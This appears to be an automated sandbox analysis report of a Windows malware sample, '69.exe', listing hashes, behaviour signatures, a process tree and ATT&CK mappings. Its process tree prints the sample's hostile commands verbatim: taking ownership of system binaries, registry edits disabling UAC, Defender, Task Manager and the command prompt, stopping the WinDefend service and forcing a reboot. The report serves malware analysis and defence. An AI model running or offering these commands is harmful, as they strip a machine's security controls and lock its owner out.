Resubmissions
10-10-2024 22:41
241010-2mlydswbmn 1021-09-2024 20:56
240921-zq2f5stcqk 321-09-2024 19:40
240921-ydv8xszdjp 1021-09-2024 19:07
240921-xszn8aybqe 10Analysis
-
max time kernel
7s -
max time network
7s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
21-09-2024 19:07
Static task
static1
Behavioral task
behavioral1
Sample
69.exe
Resource
win7-20240729-en
Errors
General
-
Target
69.exe
-
Size
2.4MB
-
MD5
165b9d15346eed1bd8da9780eb7ab4bf
-
SHA1
a9895dca7b49cd345634809d03baa51d5078c639
-
SHA256
6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
-
SHA512
b70d1ca87b71b2d0b9611e51e0a26e27b7d1a75072113965cbced770e3f46d9b7147225cb566ec06cac2921f8e4860faf882f96d2a866b2408dfacd4aaeecbf7
-
SSDEEP
49152:GpUlRhMQfcBROIbrGTPmbpzyLdKDfWLDooV9VwwzuDDFDdexGQw:GpUlBcjnpkwfkkS9V/YTAGj
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exepid Process 988 icacls.exe 1508 icacls.exe 572 icacls.exe 588 takeown.exe 604 icacls.exe 1724 takeown.exe 2520 takeown.exe 376 takeown.exe -
Executes dropped EXE 3 IoCs
Processes:
exec.exejumpscare.exernbowspam.exepid Process 2660 exec.exe 1720 jumpscare.exe 1380 rnbowspam.exe -
Loads dropped DLL 1 IoCs
Processes:
WScript.exepid Process 2712 WScript.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exepid Process 604 icacls.exe 1724 takeown.exe 376 takeown.exe 2520 takeown.exe 988 icacls.exe 1508 icacls.exe 572 icacls.exe 588 takeown.exe -
Modifies system executable filetype association 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" reg.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
wmplayer.exedescription ioc Process File opened (read-only) \??\V: wmplayer.exe File opened (read-only) \??\N: wmplayer.exe File opened (read-only) \??\L: wmplayer.exe File opened (read-only) \??\P: wmplayer.exe File opened (read-only) \??\T: wmplayer.exe File opened (read-only) \??\U: wmplayer.exe File opened (read-only) \??\X: wmplayer.exe File opened (read-only) \??\H: wmplayer.exe File opened (read-only) \??\G: wmplayer.exe File opened (read-only) \??\K: wmplayer.exe File opened (read-only) \??\Q: wmplayer.exe File opened (read-only) \??\S: wmplayer.exe File opened (read-only) \??\A: wmplayer.exe File opened (read-only) \??\E: wmplayer.exe File opened (read-only) \??\I: wmplayer.exe File opened (read-only) \??\J: wmplayer.exe File opened (read-only) \??\M: wmplayer.exe File opened (read-only) \??\O: wmplayer.exe File opened (read-only) \??\R: wmplayer.exe File opened (read-only) \??\W: wmplayer.exe File opened (read-only) \??\B: wmplayer.exe File opened (read-only) \??\Z: wmplayer.exe File opened (read-only) \??\Y: wmplayer.exe -
Drops file in System32 directory 3 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\System32\reg.exe cmd.exe File opened for modification C:\Windows\System32\taskmgr.exe cmd.exe File opened for modification C:\Windows\System32\sethc.exe cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\PerfLogs\\windows\\creepy69.jpg" reg.exe -
Drops file in Windows directory 1 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\regedit.exe cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid Process 1724 sc.exe 944 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
69.exeWScript.exeexec.exejumpscare.exernbowspam.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 69.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language exec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jumpscare.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rnbowspam.exe -
Delays execution with timeout.exe 27 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid Process 444 timeout.exe 2228 timeout.exe 2336 timeout.exe 3068 timeout.exe 808 timeout.exe 2040 timeout.exe 2944 timeout.exe 288 timeout.exe 2280 timeout.exe 1944 timeout.exe 2576 timeout.exe 2212 timeout.exe 2896 timeout.exe 2192 timeout.exe 1596 timeout.exe 2016 timeout.exe 432 timeout.exe 1952 timeout.exe 2164 timeout.exe 3040 timeout.exe 2396 timeout.exe 2472 timeout.exe 1328 timeout.exe 2896 timeout.exe 1860 timeout.exe 1428 timeout.exe 2244 timeout.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
Processes:
jumpscare.exernbowspam.exepid Process 1720 jumpscare.exe 1380 rnbowspam.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exewmplayer.exeshutdown.exedescription pid Process Token: SeTakeOwnershipPrivilege 376 takeown.exe Token: SeTakeOwnershipPrivilege 2520 takeown.exe Token: SeTakeOwnershipPrivilege 588 takeown.exe Token: SeTakeOwnershipPrivilege 1724 takeown.exe Token: 33 1424 wmplayer.exe Token: SeIncBasePriorityPrivilege 1424 wmplayer.exe Token: SeShutdownPrivilege 2352 shutdown.exe Token: SeRemoteShutdownPrivilege 2352 shutdown.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
wmplayer.exepid Process 1424 wmplayer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
69.exeWScript.exeexec.execmd.exejumpscare.exernbowspam.execmd.execmd.execmd.exedescription pid Process procid_target PID 2632 wrote to memory of 2712 2632 69.exe 30 PID 2632 wrote to memory of 2712 2632 69.exe 30 PID 2632 wrote to memory of 2712 2632 69.exe 30 PID 2632 wrote to memory of 2712 2632 69.exe 30 PID 2712 wrote to memory of 2660 2712 WScript.exe 31 PID 2712 wrote to memory of 2660 2712 WScript.exe 31 PID 2712 wrote to memory of 2660 2712 WScript.exe 31 PID 2712 wrote to memory of 2660 2712 WScript.exe 31 PID 2660 wrote to memory of 1676 2660 exec.exe 32 PID 2660 wrote to memory of 1676 2660 exec.exe 32 PID 2660 wrote to memory of 1676 2660 exec.exe 32 PID 2660 wrote to memory of 1676 2660 exec.exe 32 PID 1676 wrote to memory of 1720 1676 cmd.exe 34 PID 1676 wrote to memory of 1720 1676 cmd.exe 34 PID 1676 wrote to memory of 1720 1676 cmd.exe 34 PID 1676 wrote to memory of 1720 1676 cmd.exe 34 PID 1676 wrote to memory of 1380 1676 cmd.exe 35 PID 1676 wrote to memory of 1380 1676 cmd.exe 35 PID 1676 wrote to memory of 1380 1676 cmd.exe 35 PID 1676 wrote to memory of 1380 1676 cmd.exe 35 PID 1676 wrote to memory of 376 1676 cmd.exe 36 PID 1676 wrote to memory of 376 1676 cmd.exe 36 PID 1676 wrote to memory of 376 1676 cmd.exe 36 PID 1720 wrote to memory of 2376 1720 jumpscare.exe 37 PID 1720 wrote to memory of 2376 1720 jumpscare.exe 37 PID 1720 wrote to memory of 2376 1720 jumpscare.exe 37 PID 1720 wrote to memory of 2376 1720 jumpscare.exe 37 PID 1380 wrote to memory of 1276 1380 rnbowspam.exe 39 PID 1380 wrote to memory of 1276 1380 rnbowspam.exe 39 PID 1380 wrote to memory of 1276 1380 rnbowspam.exe 39 PID 1380 wrote to memory of 1276 1380 rnbowspam.exe 39 PID 1676 wrote to memory of 2520 1676 cmd.exe 41 PID 1676 wrote to memory of 2520 1676 cmd.exe 41 PID 1676 wrote to memory of 2520 1676 cmd.exe 41 PID 1676 wrote to memory of 988 1676 cmd.exe 42 PID 1676 wrote to memory of 988 1676 cmd.exe 42 PID 1676 wrote to memory of 988 1676 cmd.exe 42 PID 1276 wrote to memory of 760 1276 cmd.exe 44 PID 1276 wrote to memory of 760 1276 cmd.exe 44 PID 1276 wrote to memory of 760 1276 cmd.exe 44 PID 2376 wrote to memory of 1424 2376 cmd.exe 43 PID 2376 wrote to memory of 1424 2376 cmd.exe 43 PID 2376 wrote to memory of 1424 2376 cmd.exe 43 PID 1276 wrote to memory of 2040 1276 cmd.exe 46 PID 1276 wrote to memory of 2040 1276 cmd.exe 46 PID 1276 wrote to memory of 2040 1276 cmd.exe 46 PID 1676 wrote to memory of 1508 1676 cmd.exe 47 PID 1676 wrote to memory of 1508 1676 cmd.exe 47 PID 1676 wrote to memory of 1508 1676 cmd.exe 47 PID 1676 wrote to memory of 588 1676 cmd.exe 48 PID 1676 wrote to memory of 588 1676 cmd.exe 48 PID 1676 wrote to memory of 588 1676 cmd.exe 48 PID 760 wrote to memory of 1428 760 cmd.exe 49 PID 760 wrote to memory of 1428 760 cmd.exe 49 PID 760 wrote to memory of 1428 760 cmd.exe 49 PID 1676 wrote to memory of 572 1676 cmd.exe 50 PID 1676 wrote to memory of 572 1676 cmd.exe 50 PID 1676 wrote to memory of 572 1676 cmd.exe 50 PID 1676 wrote to memory of 1724 1676 cmd.exe 84 PID 1676 wrote to memory of 1724 1676 cmd.exe 84 PID 1676 wrote to memory of 1724 1676 cmd.exe 84 PID 1676 wrote to memory of 604 1676 cmd.exe 52 PID 1676 wrote to memory of 604 1676 cmd.exe 52 PID 1676 wrote to memory of 604 1676 cmd.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\69.exe"C:\Users\Admin\AppData\Local\Temp\69.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\PerfLogs\windows\exec.exe"C:\PerfLogs\windows\exec.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"4⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\PerfLogs\windows\jumpscare.exejumpscare.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\jumpscare.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Program Files\Windows Media Player\wmplayer.exewmplayer.exe "C:\PerfLogs\windows\tape.mp4"7⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1424
-
-
-
-
C:\PerfLogs\windows\rnbowspam.exernbowspam.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\rnbowspam.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K rainbow.bat7⤵
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:1428
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2228
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:1944
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2212
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2016
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2944
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2896
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2336
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2472
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2280
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:432
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:1952
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:1328
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2896
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2164
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:1860
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:3040
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2192
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:1596
-
-
-
C:\Windows\system32\timeout.exetimeout /t 17⤵
- Delays execution with timeout.exe
PID:2040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K rainbow.bat7⤵PID:1808
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:288
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2244
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:3068
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:2576
-
-
C:\Windows\system32\timeout.exetimeout /t 08⤵
- Delays execution with timeout.exe
PID:808
-
-
-
C:\Windows\system32\timeout.exetimeout /t 17⤵
- Delays execution with timeout.exe
PID:2396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K rainbow.bat7⤵PID:2220
-
-
C:\Windows\system32\timeout.exetimeout /t 17⤵
- Delays execution with timeout.exe
PID:444
-
-
-
-
C:\Windows\System32\takeown.exetakeown /f taskmgr.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:376
-
-
C:\Windows\System32\takeown.exetakeown /f sethc.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\System32\icacls.exeicacls "sethc.exe" /granted "Admin":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:988
-
-
C:\Windows\System32\icacls.exeicacls "taskmgr.exe" /granted "Admin":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1508
-
-
C:\Windows\System32\takeown.exetakeown /f reg.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\System32\icacls.exeicacls "reg.exe" /granted "Admin":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:572
-
-
C:\Windows\system32\takeown.exetakeown /f regedit.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\system32\icacls.exeicacls "regedit.exe" /granted "Admin":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:604
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f5⤵PID:2576
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f5⤵PID:1132
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f5⤵PID:1080
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f5⤵PID:1612
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵PID:2296
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f5⤵PID:808
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f5⤵PID:2168
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f5⤵PID:2216
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f5⤵PID:1648
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f5⤵PID:2164
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2188
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f5⤵PID:2044
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2248
-
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f5⤵
- Modifies system executable filetype association
- Modifies registry class
PID:2160
-
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f5⤵
- Modifies registry class
PID:1860
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f5⤵
- Disables RegEdit via registry modification
PID:1092
-
-
C:\Windows\system32\sc.exesc stop WinDefend5⤵
- Launches sc.exe
PID:1724
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled5⤵
- Launches sc.exe
PID:944
-
-
C:\Windows\system32\shutdown.exeshutdown -r -t 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:688
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1479522427372120-82456797910118033231390140125-4662704141658235516-1118853509"1⤵PID:2248
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:1216
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87KB
MD5727793378d36b60cae54319b2f5e9e4d
SHA12171ea2f0ea01b39c71ea216a945816fa9ffe751
SHA256b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2
SHA51266855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91
-
Filesize
90KB
MD5236f1bc0ecb98edb8efdc31da513e819
SHA147cc4e73c0f6d717eba708cf468bf6ecb9970086
SHA256517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4
SHA512e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109
-
Filesize
87KB
MD55425f894a45d90bac30ff9a34d2ad2f3
SHA13d9b9708b4eb917142e7fb59ba61534db2c84e7b
SHA2565f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2
SHA5129cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7
-
Filesize
219B
MD5fb63b21fb318509a75324b1037da7876
SHA1ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1
SHA2563917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05
SHA51203ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1
-
Filesize
87KB
MD5f8df0742068fa14d5a4502de32acf41b
SHA1f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0
SHA2569eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc
SHA512e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186
-
Filesize
320B
MD59d25a94b77c178f0d19bdd8440aaaade
SHA1c732a091461e0ebbd69f6f64b70016e13856908c
SHA25655163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9
SHA512e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d
-
Filesize
87KB
MD5e000d863f54529348b39030cbaf19aad
SHA19138d2cb83508bf24edee9cb581f60700a1c2b9b
SHA2565fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea
SHA51272dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df
-
Filesize
1.7MB
MD53784764b2a5db2e23e744eaff79f40c8
SHA133994de53dcf82b834961421b863181763166954
SHA2562234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf
SHA512f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f
-
Filesize
209B
MD52f1738d26b35388f87f905ecc98cf408
SHA1f1d20ac33b739f3d50d30891b743ef4374abbc5f
SHA25683a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba
SHA512e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2
-
Filesize
3KB
MD547814c389b7e63ed5a13aa8dcc435f23
SHA106f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7
SHA2562e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48
SHA5120cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382
-
Filesize
113B
MD55b094d5e0e750e15ab5628f608756249
SHA1c73caec179b8baf3833413aaab31c384c48ccd45
SHA2565ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f
SHA5125d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d
-
Filesize
158B
MD5517cae8cc74a0ef3cff3ca7f7dc1aa34
SHA1af1538a03dfa1678ab2117c715682527e22f2450
SHA256a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194
SHA5128180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573
-
C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt
Filesize128B
MD5a6ef45b0aa8443dfea5daaa1bac6a671
SHA1b27edc165fd8c892af4442698e623d14dfa87899
SHA2566ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2
SHA51213762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de